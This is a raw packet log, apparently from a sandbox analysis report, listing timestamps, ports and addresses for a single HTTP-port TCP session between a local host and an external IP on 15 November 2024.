Nov 15, 2024 10:28:58.508672953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.508739948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.508805037 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.510750055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.510807037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.510818005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.511224985 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.514995098 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.515011072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.515022993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.515064955 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.515161991 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.519457102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.519474030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.519485950 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.519541979 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.523334026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.523386955 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.523396969 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.523435116 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.523435116 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.527103901 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.527124882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.527134895 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.527172089 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.531105995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.531162977 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.531173944 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.531193018 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.531245947 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.534955025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.535063028 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.535074949 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.535115957 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.539001942 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.539026976 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.539038897 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.539078951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.539176941 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.542879105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.542908907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.542918921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.543100119 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.547071934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.547100067 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.547111034 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.547168970 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.547168970 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.550817966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.550945997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.550956011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.551112890 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.554707050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.554752111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.554761887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.554810047 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.555201054 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.558944941 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.558960915 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.558969975 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.559242964 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.562510967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.562531948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.562546015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.562597990 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.562597990 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.566505909 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.566844940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.566859007 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.567014933 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.570174932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.570194960 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.570204973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.570246935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.570246935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.574729919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.574742079 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.574754000 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.574790955 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.577786922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.577799082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.577810049 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.577842951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.578380108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.581542969 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.581657887 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.581667900 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.581676960 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.581726074 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.581726074 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.585117102 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.585135937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.585144997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.585186958 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.588875055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.589235067 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.589246035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.589256048 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.589307070 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.589339018 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.592994928 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.593048096 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.593091011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.593101025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.593112946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.593163967 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.596606970 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.596618891 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.596630096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.596673965 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.596729994 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.600543976 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.600590944 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.600600958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.600754023 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.603504896 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.603627920 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.603676081 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.603694916 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.603705883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.604104042 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.607121944 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.607134104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.607146025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.607184887 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.607217073 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.610769987 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.610780954 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.610791922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.610898972 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.614222050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.614243984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.614253998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.614306927 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.614337921 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.617686033 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.617697954 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.617707014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.617757082 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.620910883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.620924950 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.620934963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.621017933 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.621017933 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.624492884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.624555111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.624564886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.624887943 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.627171040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.627182961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.627194881 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.627219915 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.627392054 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.629957914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.629970074 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.629981041 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.630341053 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.632397890 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.632416964 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.632426023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.632555962 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.635052919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.635080099 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.635091066 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.635186911 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.637459040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.637480974 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.637490034 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.637545109 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.637545109 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.639828920 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.639839888 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.639888048 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.639903069 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.642319918 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.642339945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.642349005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.642393112 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.642471075 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.644798994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.644853115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.644861937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.644910097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.647365093 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.647377014 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.647387981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.647456884 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.647456884 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.649220943 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.649297953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.649307966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.649362087 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.652081966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.652095079 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.652106047 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.652163982 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.652164936 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.653690100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.653798103 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.653810024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.653819084 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.653860092 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.653883934 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.656395912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.656416893 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.656425953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.656471968 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.659444094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.659463882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.659483910 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.659502029 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.659533024 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.660819054 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.660831928 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.660842896 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.660883904 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.662834883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.662846088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.662857056 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.662970066 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.662970066 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.665189981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.665210962 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.665220976 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.665292025 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.667969942 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.667989969 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.668000937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.668045044 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.668045044 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.671911001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.671945095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.671978951 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.672130108 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.675770044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.675832987 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.675884008 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.676363945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.676419973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.676462889 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.679631948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.679692030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.679713964 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.679725885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.680100918 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.683765888 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.683785915 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.683798075 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.683847904 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.687664032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.687724113 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.687738895 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.687772989 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.687829018 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.692089081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.692101955 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.692114115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.692171097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.695169926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.695188999 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.695329905 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.697987080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.698059082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.698092937 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.699460983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.699522018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.699532032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.699554920 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.699573040 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.699599981 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.701196909 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.701208115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.701416016 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.702706099 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.702716112 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.702857971 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.703846931 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.703857899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.703905106 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.706554890 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.706577063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.706588030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.706634998 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.706656933 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.709949017 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.709964037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.709981918 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.709991932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.710059881 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.713424921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.713478088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.713530064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.713562012 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.713581085 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.713623047 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.717087030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.717137098 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.717201948 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.717314959 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.717892885 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.717962980 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.720769882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.720791101 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.720803022 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.720844030 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.723965883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.723995924 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.724030018 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.725025892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.725039005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.725147963 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.730138063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.730171919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.730206966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.730344057 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.731698990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.731709957 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.731862068 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.731897116 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.731906891 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.731956959 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.735791922 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.735826015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.735862017 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.735896111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.735950947 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.735950947 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.738496065 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.738508940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.738645077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.738656044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.738677979 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.738707066 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.741671085 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.741683006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.741694927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.742284060 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:58.744060993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.744071960 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:58.744163036 CET	49762	80	192.168.2.10	150.241.95.163
